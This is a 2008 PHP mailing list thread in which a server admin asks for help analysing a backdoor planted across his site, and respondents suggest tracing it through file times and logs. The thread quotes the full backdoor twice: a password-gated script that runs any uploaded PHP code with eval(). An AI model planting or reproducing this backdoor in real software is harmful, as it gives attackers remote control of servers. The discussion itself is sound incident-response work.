On Fri, Apr 18, 2008 at 12:58 PM, Jim Lucas <lists@xxxxxxxxx> wrote:
>
> Eric Butera wrote:
>
> > On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:
> >
> > > I'm continuing to work on this.
> > >
> > > One thing that seems obvious. The code executes the script code, using
> > > eval(), directly from the /tmp dir. So the usual security tests we do
> prior
> > > to using move_uploaded_file() are useless.
> > >
> > >
> > >
> > > Al wrote:
> > >
> > >
> > > > I'm still fighting my hack problem on one of my servers. Can anyone
> help
> > > >
> > > me figure out what's the purpose of this code. The hack places this
> file in
> > > numerous dirs on the site, I assume using a php script because the owner
> is
> > > "nobody".
> > >
> > > > I can sort of figure what is doing; but, I can't figure out what the
> > > >
> > > hacker is using it for.
> > >
> > > > Incidentally, I've changed all passwords and restricted ftp to two
> people.
> > > >
> > > I see no sign that any code is written with by site owner, i.e, ftp.
> And,
> > > I've looked carefully for suspect php files.
> > >
> > > >
> > > >
> > > > > <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t)
> {
> > > > >
> > > >
> > > echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
> > > "<pre>"; testdata('start'); if
> > > (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
> > >
> @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
> > > eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
> > > testdata('end'); echo "</pre>"; ?>
> > >
> > > >
> > > >
> > > > > <?php error_reporting(1);
> > > > > global $HTTP_SERVER_VARS;
> > > > > function say($t)
> > > > > {
> > > > > echo "$t\n";
> > > > > } ;
> > > > > function testdata($t)
> > > > > {
> > > > > say(md5("testdata_$t"));
> > > > > } ;
> > > > > echo "<pre>";
> > > > > testdata('start');
> > > > > if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
> > > > > {
> > > > > if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],
> "rb"),
> > > > >
> > > >
> > > $HTTP_POST_FILES["f"]["size"]))
> > >
> > > >
> > > > > {
> > > > > eval($code);
> > > > > } else
> > > > > {
> > > > > testdata('f');
> > > > > } ;
> > > > > } else
> > > > > {
> > > > > testdata('pass');
> > > > > } ;
> > > > > testdata('end');
> > > > > echo "</pre>";
> > > > > ?>
> > > > >
> > > > >
> > > >
> > > --
> > > PHP General Mailing List (http://www.php.net/)
> > > To unsubscribe, visit: http://www.php.net/unsub.php
> > >
> > >
> > >
> >
> > Maybe you can look at the file time on the script in /tmp and look at
> > server logs around that same time to see if that is any hint of where
> > it might have come from.
> >
> >
>
> That won't work, the uploaded file is deleted after the
> script/process/request is completed. Standard PHP clean would get rid of
> it.
>
>
>
> --
> Jim Lucas
>
> "Some men are born to greatness, some achieve greatness,
> and some have greatness thrust upon them."
>
> Twelfth Night, Act II, Scene V
> by William Shakespeare
>
>
There is a file in /tmp that got created at some point by a request.
That request happened at a given time. That file got created at a
time. Even though the /tmp/dkhfsdfkh is gone the exploit is there. I
guess I don't know what else to say.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
